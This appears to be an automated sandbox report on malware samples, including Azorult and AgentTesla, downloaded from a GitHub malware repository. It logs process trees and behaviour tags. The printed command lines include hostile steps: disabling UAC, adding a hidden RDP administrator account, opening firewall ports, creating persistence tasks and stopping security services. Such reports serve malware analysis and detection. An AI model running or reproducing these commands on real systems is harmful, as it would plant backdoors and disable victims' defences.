PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe -
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 1172 attrib.exe 4720 attrib.exe 3580 attrib.exe 3864 attrib.exe 2528 attrib.exe 1616 attrib.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Da2dalus/The-MALWARE-Repo1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffc2a9dcf8,0x7fffc2a9dd04,0x7fffc2a9dd102⤵PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2024 /prefetch:32⤵
- Downloads MZ/PE file
PID:3840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1992 /prefetch:22⤵PID:2792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2512 /prefetch:82⤵PID:3904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3172 /prefetch:12⤵PID:3544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:2160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4216,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4244 /prefetch:22⤵PID:2740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5204,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4520 /prefetch:82⤵PID:2788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=208,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5468 /prefetch:82⤵PID:724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5456,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5224 /prefetch:82⤵PID:4448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5356,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5536 /prefetch:82⤵PID:1636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5500,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5372 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5444,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4228 /prefetch:82⤵PID:4940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4376,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5400 /prefetch:82⤵PID:100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5240,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5664 /prefetch:12⤵PID:5036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5820,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3536 /prefetch:12⤵PID:4192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5824,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6008 /prefetch:12⤵PID:4148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4764,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3580 /prefetch:82⤵PID:3700
-
-
C:\Users\Admin\Downloads\WinNuke.98.exe"C:\Users\Admin\Downloads\WinNuke.98.exe"2⤵
- Executes dropped EXE
PID:4416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5928,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5768 /prefetch:82⤵PID:3128
-
-
C:\Users\Admin\Downloads\xpaj.exe"C:\Users\Admin\Downloads\xpaj.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:1340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3436,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4260 /prefetch:82⤵PID:876
-
-
C:\Users\Admin\Downloads\xpaj.exe"C:\Users\Admin\Downloads\xpaj.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:4284
-
-
C:\Users\Admin\Downloads\Mabezat.exe"C:\Users\Admin\Downloads\Mabezat.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3684
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6104,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5672 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2196
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:1648 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3624 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- Checks computer location settings
PID:4040 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵PID:1956
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:3472
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:3116
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
PID:736
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2524
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3144
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1400
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
PID:2528
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:3864
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
PID:4116
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:3956
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:2516
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵PID:4792
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:3116
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3012 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1372 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4460
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2932 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
- Checks computer location settings
PID:2000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
- Checks computer location settings
- Modifies registry class
PID:4016 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:1616
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4572
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
PID:4616
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵
- System Location Discovery: System Language Discovery
PID:2140
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
- Executes dropped EXE
PID:4728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:3028
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2660
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵PID:552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:3892
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵PID:4936
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵PID:216
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:232
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵PID:2784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵PID:1960
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵PID:2872
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵PID:4668
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵PID:2116
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵PID:3340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵PID:456
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵PID:3316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵PID:400
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵PID:3800
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵PID:3956
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵PID:3584
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵PID:1360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵PID:3472
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:4664 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:3284
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵
- System Location Discovery: System Language Discovery
PID:4728 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵PID:1408
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:2284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵
- System Location Discovery: System Language Discovery
PID:4544
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
PID:764 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3684
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
PID:3316
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
- Hide Artifacts: Hidden Users
PID:4344
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵PID:2216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵
- System Location Discovery: System Language Discovery
PID:4464
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1616
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1172
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4720
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:2028
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1235⤵
- Checks computer location settings
- Executes dropped EXE
PID:2292 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1908 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1C6F.tmp\1C70.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵PID:4212
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:5008
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4540 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵PID:1560
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵PID:2968
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵PID:3012
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:1344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵PID:4460
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:456
-
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵PID:4024
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15⤵
- Scheduled Task/Job: Scheduled Task
PID:3876
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:3116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
PID:452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵PID:4752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3028
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:3956
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:4728
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Kills process with taskkill
PID:4380
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- Kills process with taskkill
PID:116
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3580
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵PID:2228
-
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
PID:736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵
- System Location Discovery: System Language Discovery
PID:1636 -
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
PID:2720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵PID:1288
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵
- System Location Discovery: System Language Discovery
PID:1696 -
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵PID:4608
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵PID:3988
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵PID:4676
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵PID:3808
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1560
-
-
-
